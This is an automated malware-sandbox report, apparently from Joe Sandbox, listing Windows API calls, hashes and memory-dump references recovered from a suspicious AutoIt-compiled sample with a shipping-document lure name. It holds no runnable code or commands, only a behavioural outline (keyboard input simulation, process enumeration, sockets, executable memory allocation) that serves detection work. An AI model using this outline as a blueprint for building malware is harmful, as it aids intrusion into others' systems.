                                                                • GetSystemDirectoryW.KERNEL32(?), ref: 00971775
                                                                  • Part of subcall function 009ABFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0097195E,?), ref: 009ABFFE
                                                                  • Part of subcall function 009ABFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 009AC010
                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0097196D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                • String ID: 0`$WIN_XPe
                                                                • API String ID: 582185067-1883032028
                                                                • Opcode ID: e2f827ab4a561f9d6ffc852ccd7d1a873f95b8eb60fa0f8d12878da4ec0f355f
                                                                • Instruction ID: 123fa10c772c5332dbc6c249e08457a62892cfe292cc8ad500205f22ef975a3b
                                                                • Opcode Fuzzy Hash: e2f827ab4a561f9d6ffc852ccd7d1a873f95b8eb60fa0f8d12878da4ec0f355f
                                                                • Instruction Fuzzy Hash: 03F06D72814109DFCB19DBA8CE98BECBBF8BB58300F544495E106B20A0C7344F84DF60
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00934BD0,?,00934DEF,?,009F52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00934C11
                                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00934C23
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                • API String ID: 2574300362-3689287502
                                                                • Opcode ID: 1ad38392ffe684a388b182c4f236c0fc69948e9664529616346eb7728d0eb7c5
                                                                • Instruction ID: 028e7535ab407b45b0ed06e09c52d8fb9c4fd7e9225610cd8fa9b8e529991d5a
                                                                • Opcode Fuzzy Hash: 1ad38392ffe684a388b182c4f236c0fc69948e9664529616346eb7728d0eb7c5
                                                                • Instruction Fuzzy Hash: D2D01230525713CFDB205F75DE18646B6E9EF09365F12CC39D4D5D6150E6B0D880CA50
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00934B83,?), ref: 00934C44
                                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00934C56
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                • API String ID: 2574300362-1355242751
                                                                • Opcode ID: b7c94fd9564cad5f33c47be308cc57b1864560e7e633b7b00e0420291e41d633
                                                                • Instruction ID: 00935a47313398c1a45161349ac122eeb1f9cdb58cf5c154fd80a4f16fbb01ad
                                                                • Opcode Fuzzy Hash: b7c94fd9564cad5f33c47be308cc57b1864560e7e633b7b00e0420291e41d633
                                                                • Instruction Fuzzy Hash: 23D01230524713CFD7245F36DE1864676D8AF05365F12CC79D4D6D6160E670D880CA50
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,009B1039), ref: 009B0DF5
                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 009B0E07
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                • API String ID: 2574300362-4033151799
                                                                • Opcode ID: 10abdb8c7159caf5c1aa6cdea43ce828877715d5cf89e54d687eef2a188cbe0c
                                                                • Instruction ID: e672d0965c4460be091631302786d8b7ceb42a963465237ba77eced5a01d2c87
                                                                • Opcode Fuzzy Hash: 10abdb8c7159caf5c1aa6cdea43ce828877715d5cf89e54d687eef2a188cbe0c
                                                                • Instruction Fuzzy Hash: 4AD01770524726CFD7219F7ACE096C776E9AF84366F11CC3EE896D2150EAB0E890CA50
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000001,009A8CF4,?,009BF910), ref: 009A90EE
                                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 009A9100
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                                • API String ID: 2574300362-199464113
                                                                • Opcode ID: 0a101217ddd95d3733a5c02be09d470be5c748a39f5b8faad2be0a8cfd0ef9ef
                                                                • Instruction ID: 381d0baf37d896832c4bc470d07dc1c9d84a7e64b7e1af92bb4af0c7c94928ee
                                                                • Opcode Fuzzy Hash: 0a101217ddd95d3733a5c02be09d470be5c748a39f5b8faad2be0a8cfd0ef9ef
                                                                • Instruction Fuzzy Hash: EFD0173452C723CFDB209F79DD2C64676E8AF46365B12CC3AD49AD6590FA70C880CA90
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: LocalTime__swprintf
                                                                • String ID: %.3d$WIN_XPe
                                                                • API String ID: 2070861257-2409531811
                                                                • Opcode ID: ab519a8f75d1de73fff65d0eb389fa9b02b6cb3119ca19d38fad3a63039fb068
                                                                • Instruction ID: 5d0c7112710cc2117bd1fac66aacc78e52c185bf8fa1a023a094c91ed5898777
                                                                • Opcode Fuzzy Hash: ab519a8f75d1de73fff65d0eb389fa9b02b6cb3119ca19d38fad3a63039fb068
                                                                • Instruction Fuzzy Hash: 9AD05B7380910DFBC709D7959C89CFD73BCA758311F104D52F80AE2040E2398B54EB25
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: df0a715809004b0fdee3d6579f3ed48b845bb43344b55781d8e7cc8a693c42df
                                                                • Instruction ID: 38087b49eb0c2b96a534543b6df802fdf8179399d1fb5f5fe7d57658ec6c85e8
                                                                • Opcode Fuzzy Hash: df0a715809004b0fdee3d6579f3ed48b845bb43344b55781d8e7cc8a693c42df
                                                                • Instruction Fuzzy Hash: 8FC15C75A04216EFCB14DFA4C884AAEFBB9FF48314B248599E815DB361D730ED81DB90
                                                                APIs
                                                                • CharLowerBuffW.USER32(?,?), ref: 009AE0BE
                                                                • CharLowerBuffW.USER32(?,?), ref: 009AE101
                                                                  • Part of subcall function 009AD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 009AD7C5
                                                                • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 009AE301
                                                                • _memmove.LIBCMT ref: 009AE314
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: BuffCharLower$AllocVirtual_memmove
                                                                • String ID:
                                                                • API String ID: 3659485706-0
                                                                • Opcode ID: 9114abe876ebcaba45a2d6a15530a911398595d98b824d219c2c23384dfbc372
                                                                • Instruction ID: eee6529ba5c11a116d3f9b51cdcae5ec9727e5a8d136a97ec1a14ed49a036ea7
                                                                • Opcode Fuzzy Hash: 9114abe876ebcaba45a2d6a15530a911398595d98b824d219c2c23384dfbc372
                                                                • Instruction Fuzzy Hash: F4C136716083119FC714DF28C480A6ABBE4FF8A714F14896EF8999B351D771E946CF82
                                                                APIs
                                                                • CoInitialize.OLE32(00000000), ref: 009A80C3
                                                                • CoUninitialize.OLE32 ref: 009A80CE
                                                                  • Part of subcall function 0098D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0098D5D4
                                                                • VariantInit.OLEAUT32(?), ref: 009A80D9
                                                                • VariantClear.OLEAUT32(?), ref: 009A83AA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                • String ID:
                                                                • API String ID: 780911581-0
                                                                • Opcode ID: c605b5d19477f588521454cfa6dd47b962049a5b0fb724bf471af81cc2479122
                                                                • Instruction ID: 3460d1554ee0c28c9b4564fe688456076a1098a51c2da7891f6863431a35e0ff
                                                                • Opcode Fuzzy Hash: c605b5d19477f588521454cfa6dd47b962049a5b0fb724bf471af81cc2479122
                                                                • Instruction Fuzzy Hash: 7BA149756047019FCB00DF68C885B2AB7E4BF8A764F144859F99A9B3A1CB74ED05CF82
                                                                APIs
                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,009C2C7C,?), ref: 009876EA
                                                                • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,009C2C7C,?), ref: 00987702
                                                                • CLSIDFromProgID.OLE32(?,?,00000000,009BFB80,000000FF,?,00000000,00000800,00000000,?,009C2C7C,?), ref: 00987727
                                                                • _memcmp.LIBCMT ref: 00987748
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: FromProg$FreeTask_memcmp
                                                                • String ID:
                                                                • API String ID: 314563124-0
                                                                • Opcode ID: 01ba31a92dc29113419822b2ea6289253b1316a6a56337fca66d9b46cb020bab
                                                                • Instruction ID: 85e8367fa39ccbd558cb52ad499db6826df09ee2f5cd20feec9feffaeade9b6f
                                                                • Opcode Fuzzy Hash: 01ba31a92dc29113419822b2ea6289253b1316a6a56337fca66d9b46cb020bab
                                                                • Instruction Fuzzy Hash: BA81D775A00109EFCB04DFE4C984EEEB7B9FF89315F204598E516AB250DB71AE06CB61
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Variant$AllocClearCopyInitString
                                                                • String ID:
                                                                • API String ID: 2808897238-0
                                                                • Opcode ID: a83e91cd5bdeb0a278d3369f37dd441d5d41f904c1bacae4f1936b9152b26407
                                                                • Instruction ID: ceecde25e205ff88198a991da1813c2bec1d102ae9a07af1bf1410a6e1fb9206
                                                                • Opcode Fuzzy Hash: a83e91cd5bdeb0a278d3369f37dd441d5d41f904c1bacae4f1936b9152b26407
                                                                • Instruction Fuzzy Hash: F95170747143019ADB28FF65D895B2AB3E9AF85310F20D81FE696DF3D1DA74D8808B01
                                                                APIs
                                                                • GetWindowRect.USER32(00E8D798,?), ref: 009B9863
                                                                • ScreenToClient.USER32(00000002,00000002), ref: 009B9896
                                                                • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 009B9903
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Window$ClientMoveRectScreen
                                                                • String ID:
                                                                • API String ID: 3880355969-0
                                                                • Opcode ID: 27890ef90ff9a8100a13b75bf787c8f6f1030262b79ec3c66807decae3db5f13
                                                                • Instruction ID: 08344dfa0528266eeb3487f6a7c813c747ed37e3d030b7a99908d0f2348bcd00
                                                                • Opcode Fuzzy Hash: 27890ef90ff9a8100a13b75bf787c8f6f1030262b79ec3c66807decae3db5f13
                                                                • Instruction Fuzzy Hash: 4A514F34A10608EFCF14CF64CA84AEE7BB9FF45360F118269FA559B2A0D730AD41DB90
APIs
• SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00989AD2
• __itow.LIBCMT ref: 00989B03
  • Part of subcall function 00989D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00989DBE
• SendMessageW.USER32(?,0000110A,00000001,?), ref: 00989B6C
• __itow.LIBCMT ref: 00989BC3
Similarity
• API ID: MessageSend$__itow
• String ID:
• API String ID: 3379773720-0
• Opcode ID: b84a94a445dcf6636d8d7f70d8aa27e9a82d9b75b7e4756f0487017b9b30186a
• Instruction ID: 186a47515f820e3d2c86bf333b044888e6a8a6c7a48bc2250ccda8002eae5dce
• Opcode Fuzzy Hash: b84a94a445dcf6636d8d7f70d8aa27e9a82d9b75b7e4756f0487017b9b30186a
• Instruction Fuzzy Hash: 99415174A00208ABDF25EF54D845BFEBBB9EF88764F040069F905A7391DB749E44CB61
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 009A69D1
• WSAGetLastError.WSOCK32(00000000), ref: 009A69E1
  • Part of subcall function 00939837: __itow.LIBCMT ref: 00939862
  • Part of subcall function 00939837: __swprintf.LIBCMT ref: 009398AC
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 009A6A45
• WSAGetLastError.WSOCK32(00000000), ref: 009A6A51
Similarity
• API ID: ErrorLast$__itow__swprintfsocket
• String ID:
• API String ID: 2214342067-0
• Opcode ID: 3d6f51eac78e69180a0d5d8216e1d5f3c9dd9f2ebbd99b6f83b202109f30a7ea
• Instruction ID: 402eba30c8ef12f61336a7e151b1c35fcffc38fd4feae0df8abfe43f2b6ba0f4
• Opcode Fuzzy Hash: 3d6f51eac78e69180a0d5d8216e1d5f3c9dd9f2ebbd99b6f83b202109f30a7ea
• Instruction Fuzzy Hash: CD4162757402006FEB60AF24DC86F2A77A89B85B14F04C558FA59AF3D2DAB49D008B91
APIs
• #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,009BF910), ref: 009A64A7
• _strlen.LIBCMT ref: 009A64D9
Similarity
• API ID: _strlen
• String ID:
• API String ID: 4218353326-0
• Opcode ID: dd8fc4cf10a315fc1dec9637721c14688aef7be49c7f172874ef393c0c9ff6b5
• Instruction ID: 022a100afa412787ddc743e84b5529809d4cbf0fa3d0882e29de3272f1e0a590
• Opcode Fuzzy Hash: dd8fc4cf10a315fc1dec9637721c14688aef7be49c7f172874ef393c0c9ff6b5
• Instruction Fuzzy Hash: 04417771A00104AFCB14FBA8DCD6FBEB7B9AF89310F148555F9199B292DB70AD04CB90
APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0099B89E
• GetLastError.KERNEL32(?,00000000), ref: 0099B8C4
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0099B8E9
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0099B915
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0
• Opcode ID: 9e85402842b2cb07f7edaf533f461a77f2dd136081bb89e97a353adfdd949cd1
• Instruction ID: d4b95e0dc6035301ff8a3c7797ffc5e308ffecc87d2556cac59c8c8a80f894d5
• Opcode Fuzzy Hash: 9e85402842b2cb07f7edaf533f461a77f2dd136081bb89e97a353adfdd949cd1
• Instruction Fuzzy Hash: B8410239600610DFCB11EF19C584B59BBE5AF8A324F198098EC4AAB362CB74ED01DF91
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009B88DE
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
• Opcode ID: 50fa4554b713cecc7370b207663a9ad863f4b95126676f66501b26a606e7bf8b
• Instruction ID: 6c164836fbf1c7e726583c488ede29e6abb114519c6bb0f13e3eea06b98d6e55
• Opcode Fuzzy Hash: 50fa4554b713cecc7370b207663a9ad863f4b95126676f66501b26a606e7bf8b
• Instruction Fuzzy Hash: 3931C134614108BFEF249A58CE45BFA7BADEB0E370F544512FA25E61A1CA70E940DB52
APIs
• ClientToScreen.USER32(?,?), ref: 009BAB60
• GetWindowRect.USER32(?,?), ref: 009BABD6
• PtInRect.USER32(?,?,009BC014), ref: 009BABE6
• MessageBeep.USER32(00000000), ref: 009BAC57
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
• Opcode ID: 700752a6ee5de2a28ca71b2be35b59df10c5563e7513b1b3fc3b838890513fe9
• Instruction ID: b1b99ba7484766d13a7b3726ef1789bd3d6d7251812d4bd25e13045ec8e371b7
• Opcode Fuzzy Hash: 700752a6ee5de2a28ca71b2be35b59df10c5563e7513b1b3fc3b838890513fe9
• Instruction Fuzzy Hash: 5D41AF30A04619DFCB11DF58CA84BA97BF5FF49360F1885A9E994DB260D730E841DB92
APIs
• GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00990B27
• SetKeyboardState.USER32(00000080,?,00000001), ref: 00990B43
• PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00990BA9
• SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00990BFB
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
• Opcode ID: 31103a5ba9fb4cb4ef7f295fae2a36c925eb72d21abf6442a292fa2a16d868e2
• Instruction ID: ddc3b9fcec2174960d3dfa66bb8a2f9eaee57f2bfb1312d4d4dcc646ea9ad9cb
• Opcode Fuzzy Hash: 31103a5ba9fb4cb4ef7f295fae2a36c925eb72d21abf6442a292fa2a16d868e2
• Instruction Fuzzy Hash: 92313A70D44218AEFF358B2D8C05BFEBBADABC5329F08436AF5B1521D1C3B989909751
APIs
• GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00990C66
• SetKeyboardState.USER32(00000080,?,00008000), ref: 00990C82
• PostMessageW.USER32(00000000,00000101,00000000), ref: 00990CE1
• SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00990D33
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
• Opcode ID: 591f81b7eea2891fa61238a8001e629f625d1ed857184913e627c928d79f3c96
• Instruction ID: 65af0c7d2e2232c1fb4b6701a0f5f23360c3a3a439d8157c68ccdafaf1c6e284
• Opcode Fuzzy Hash: 591f81b7eea2891fa61238a8001e629f625d1ed857184913e627c928d79f3c96
• Instruction Fuzzy Hash: 58314630900308AEFF308B6C8C147FEBBAAABC5320F08871AE4E0521D1D3799D55D7A1
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009661FB
• __isleadbyte_l.LIBCMT ref: 00966229
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00966257
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0096628D
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: 6d79e4e3bb081bbbfab112016538bff61c6cb43bf625adea283487b5b19fe8bf
• Instruction ID: b1a4c7d11f165895f3c175d60d5c5880a431843fbb813cdee8e4cc4295793523
• Opcode Fuzzy Hash: 6d79e4e3bb081bbbfab112016538bff61c6cb43bf625adea283487b5b19fe8bf
• Instruction Fuzzy Hash: 5631DE30608246AFDF218F65CC54BAA7FA9FF82320F154529E864D71A1E731E950DB90
APIs
• GetForegroundWindow.USER32 ref: 009B4F02
  • Part of subcall function 00993641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0099365B
  • Part of subcall function 00993641: GetCurrentThreadId.KERNEL32 ref: 00993662
  • Part of subcall function 00993641: AttachThreadInput.USER32(00000000,?,00995005), ref: 00993669
• GetCaretPos.USER32(?), ref: 009B4F13
• ClientToScreen.USER32(00000000,?), ref: 009B4F4E
• GetForegroundWindow.USER32 ref: 009B4F54
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
• Opcode ID: 0b6d0b5ee9bde9843560bf4c4e308817e98ea90bed2c4e92b7dc78dae22bb425
• Instruction ID: 1c14689901f30e79826e1d0ad56e50f64214125f6bd3a55fb132498f6662eb14
• Opcode Fuzzy Hash: 0b6d0b5ee9bde9843560bf4c4e308817e98ea90bed2c4e92b7dc78dae22bb425
• Instruction Fuzzy Hash: C8310C75D00108AFDB10EFA9C985AEFB7F9EF99310F10446AF415E7241DA75AE058FA0
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00993C7A
• Process32FirstW.KERNEL32(00000000,?), ref: 00993C88
• Process32NextW.KERNEL32(00000000,?), ref: 00993CA8
• CloseHandle.KERNEL32(00000000), ref: 00993D52
                                                                Similarity
                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                • String ID:
                                                                • API String ID: 420147892-0
                                                                • Opcode ID: d452cbce5289568bbb5db48caf0f3796b6e127d4e874df26c1cb86b397031cd5
                                                                • Instruction ID: 1624a97d719130b6300f2456bad9d4f89e5bea5e11012a25d089db5ab1e5ee98
                                                                • Opcode Fuzzy Hash: d452cbce5289568bbb5db48caf0f3796b6e127d4e874df26c1cb86b397031cd5
                                                                • Instruction Fuzzy Hash: 2F31C07110C3059FD710EF58C891BAFBBE8EFC9354F40092CF481861A1EB71AA49CB92
                                                                APIs
                                                                  • Part of subcall function 00932612: GetWindowLongW.USER32(?,000000EB), ref: 00932623
                                                                • GetCursorPos.USER32(?), ref: 009BC4D2
